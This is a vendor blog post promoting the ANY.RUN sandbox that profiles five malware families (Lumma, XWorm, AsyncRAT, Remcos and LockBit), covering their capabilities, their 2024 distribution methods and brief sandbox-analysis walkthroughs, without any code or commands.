2024 had its fair share of high-profile cyber attacks, with companies as big as Dell and TicketMaster falling victim to data breaches and other infrastructure compromises. In 2025, this trend will continue. So, to be prepared for any kind of malware attack, every organization needs to know its cyber enemy in advance. Here are 5 common malware families that you can start preparing to counter right now.
Lumma is a widely available malware designed to steal sensitive information. It has been openly sold on the Dark Web since 2022. This malware can effectively collect and exfiltrate data from targeted applications, including login credentials, financial information, and personal details.
Lumma is regularly updated to enhance its capabilities. It can log detailed information from compromised systems, such as browsing history and cryptocurrency wallet data. It can be used to install other malicious software on infected devices. In 2024, Lumma was distributed through various methods, including fake CAPTCHA pages, torrents, and targeted phishing emails.
Proactive analysis of suspicious files and URLs within a sandbox environment can effectively help you prevent Lumma infection.
Let’s see how you can do it using ANY.RUN’s cloud-based sandbox. It not only delivers definitive verdicts on malware and phishing along with actionable indicators but also allows real-time interaction with the threat and the system.
Take a look at this analysis of a Lumma attack.
It starts with an archive which contains an executable. Once we launch the .exe file, the sandbox automatically logs all processes and network activities, showing Lumma’s actions.
It connects to its command-and-control (C2) server.
Next, it begins to collect and exfiltrate data from the machine.
After finishing the analysis, we can export a report on this sample, featuring all the important indicators of compromise (IOCs) and TTPs that can be used to enrich defenses against possible Lumma attacks in your organization.
XWorm is a malicious program that gives cybercriminals remote control over infected computers. First appearing in July 2022, it can collect a wide range of sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data.
XWorm allows attackers to monitor victims’ activities by tracking keystrokes, capturing webcam images, listening to audio input, scanning network connections, and viewing open windows. It can also access and manipulate the computer’s clipboard, potentially stealing cryptocurrency wallet credentials.
In 2024, XWorm was involved in many large-scale attacks, including ones that exploited CloudFlare tunnels and legitimate digital certificates.
In this attack, we can see the original phishing email, which features a link to a Google drive.
Once we follow the link, we are offered to download an archive which is protected with a password.
The password can be found in the email. After entering it, we can access a .vbs script inside the .zip file.
As soon as we launch the script, the sandbox instantly detects malicious activities, which eventually lead to the deployment of XWorm on the machine.
AsyncRAT is another remote access trojan on the list. First seen in 2019, it was initially spread through spam emails, often exploiting the COVID-19 pandemic as a lure. Since then, the malware has gained popularity and been used in various cyber attacks.
AsyncRAT has evolved over time to include a wide range of malicious capabilities. It can secretly record a victim’s screen activity, log keystrokes, install additional malware, steal files, maintain a persistent presence on infected systems, disable security software, and launch attacks that overwhelm targeted websites.
In 2024, AsyncRAT remained a significant threat, often disguised as pirated software. It was also one of the first malware families to be distributed as part of complex attacks involving scripts generated by AI.
In this analysis session, we can see another archive with a malicious executable inside.
Detonating the file kicks off the execution chain of XWorm, which involves the use of PowerShell scripts to fetch additional files needed to facilitate the infection.
Once the analysis is finished, the sandbox displays the final verdict on the sample.
Remcos is a malware that has been marketed by its creators as a legitimate remote access tool. Since its launch in 2019, it has been used in numerous attacks to perform a wide range of malicious activities, including stealing sensitive information, remotely controlling the system, recording keystrokes, capturing screen activity, etc.
In 2024, campaigns to distribute Remcos used techniques like script-based attacks, which often start with a VBScript that launches a PowerShell script to deploy the malware, and exploited vulnerabilities like CVE-2017-11882 by leveraging malicious XML files.
In this example, we are met with another phishing email that features a .zip attachment and a password for it.
The final payload leverages Command Prompt and Windows system processes to load and execute Remcos.
The ANY.RUN sandbox maps the entire chain of attack to the MITRE ATT&CK matrix for convenience.
LockBit is a ransomware primarily targeting Windows devices. It is considered one of the biggest ransomware threats, accounting for a substantial portion of all Ransomware-as-a-Service (RaaS) attacks. The decentralized nature of the LockBit group has allowed it to compromise numerous high-profile organizations worldwide, including the UK’s Royal Mail and India’s National Aerospace Laboratories (in 2024).
Law enforcement agencies have taken steps to combat the LockBit group, leading to the arrest of several developers and partners. Despite these efforts, the group continues to operate, with plans to release a new version, LockBit 4.0, in 2025.
Check out this sandbox session, showing how fast LockBit infects and encrypts files on a system.
By tracking file system changes, we can see it modified 300 files in less than a minute.
The malware also drops a ransom note, detailing the instructions for getting the data back.
Analyzing cyber threats proactively instead of reacting to them once they become a problem for your organization is the best course of action any business can take. Simplify it with ANY.RUN’s Interactive sandbox by examining all suspicious files and URLs inside a safe virtual environment that helps you identify malicious content with ease.
With the ANY.RUN sandbox, your company can:
Try all features of ANY.RUN with a 14-day free trial.
